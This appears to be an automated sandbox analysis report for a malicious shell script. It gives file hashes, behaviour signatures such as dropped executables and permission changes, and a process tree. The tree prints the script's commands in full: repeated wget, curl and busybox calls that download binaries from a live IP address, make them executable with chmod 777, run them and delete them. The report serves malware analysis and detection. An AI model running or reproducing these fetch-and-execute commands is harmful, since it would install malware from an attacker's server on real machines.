Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
-
Size
10KB
-
MD5
1ac86a90ce63f5179c129c8cf2fda09b
-
SHA1
93b8c384331017eeb6de7c986cc660f98b161846
-
SHA256
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f
-
SHA512
41efa6d2d833f311f30c0bc54b03684a2a367b8a2af5ef65c4558e978d25c26be60b9adf80b8f136de6f226c8d22f66cb74600dbd88cfeed4e1a7c92eda7cda0
-
SSDEEP
192:WryGNuGD2K9GmNVqMw1+9NeVlhl9NeVlhWHyGNuGp2K9Gmp:KyGNuGD2K9GmNVqMw1PyGNuGp2K9Gmp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 820 chmod 880 chmod 892 chmod 904 chmod 959 chmod 725 chmod 751 chmod 916 chmod 953 chmod 928 chmod 767 chmod 934 chmod 940 chmod 742 chmod 787 chmod 922 chmod 965 chmod 736 chmod 832 chmod 910 chmod 946 chmod 812 chmod 826 chmod 898 chmod 886 chmod 848 chmod 868 chmod -
Executes dropped EXE 27 IoCs
ioc pid Process /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 726 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 737 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 743 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 752 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 768 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 788 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 813 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 821 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 827 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 833 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 849 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 869 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 881 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 887 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 893 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 899 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 905 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 911 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 917 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 923 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 929 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 935 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 941 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 947 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 954 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 960 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 966 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl
Processes
-
/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:724
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:731
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:735
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:741
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:750
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:764
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:782
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:808
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:819
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:825
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:831
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:845
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:865
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:879
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:885
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:891
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:897
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:903
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:909
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:915
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:921
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:927
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:930
-
-
